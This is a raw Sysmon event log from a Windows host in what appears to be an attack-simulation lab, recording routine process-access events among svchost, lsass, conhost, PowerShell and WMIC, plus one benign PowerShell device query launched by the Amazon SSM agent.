12:01:06.299{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6482-6064-6500-00000000AE01}3228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002725Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.267{266CAFBE-647E-6064-4800-00000000AE01}40763036C:\Windows\system32\conhost.exe{266CAFBE-6482-6064-6500-00000000AE01}3228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002724Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.266{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002723Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.265{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002722Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.265{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002721Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.265{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002720Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.265{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002719Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.265{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002718Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.265{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002717Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.265{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002716Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.265{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002715Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.264{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-6482-6064-6500-00000000AE01}3228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002714Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.264{266CAFBE-647E-6064-4300-00000000AE01}39243756C:\Program Files\Amazon\SSM\ssm-agent-worker.exe{266CAFBE-6482-6064-6500-00000000AE01}3228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Amazon\SSM\ssm-agent-worker.exe+5d9ee 154100x80000000000000002713Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.264{266CAFBE-6482-6064-6500-00000000AE01}3228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell "Get-CimInstance Win32_PnPEntity | Where-Object { $_.Service -eq 'xenvbd' }" "| Select-Object" DeviceID "| ConvertTo-Json -Depth 3"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{266CAFBE-647E-6064-4300-00000000AE01}3924C:\Program Files\Amazon\SSM\ssm-agent-worker.exe"C:\Program Files\Amazon\SSM\ssm-agent-worker.exe" 10341000x80000000000000002712Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.227{266CAFBE-646A-6064-0B00-00000000AE01}856896C:\Windows\system32\lsass.exe{266CAFBE-6482-6064-6400-00000000AE01}4072C:\Windows\System32\Wbem\wmic.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002711Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.227{266CAFBE-646A-6064-0B00-00000000AE01}856896C:\Windows\system32\lsass.exe{266CAFBE-6482-6064-6400-00000000AE01}4072C:\Windows\System32\Wbem\wmic.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002710Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.223{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6482-6064-6400-00000000AE01}4072C:\Windows\System32\Wbem\wmic.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002709Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.215{266CAFBE-647E-6064-4800-00000000AE01}40763036C:\Windows\system32\conhost.exe{266CAFBE-6482-6064-6400-00000000AE01}4072C:\Windows\System32\Wbem\wmic.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002708Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.213{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002707Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.213{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002706Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.213{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002705Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.213{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002704Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.213{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002703Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.213{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002702Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.213{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002701Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.212{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002700Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 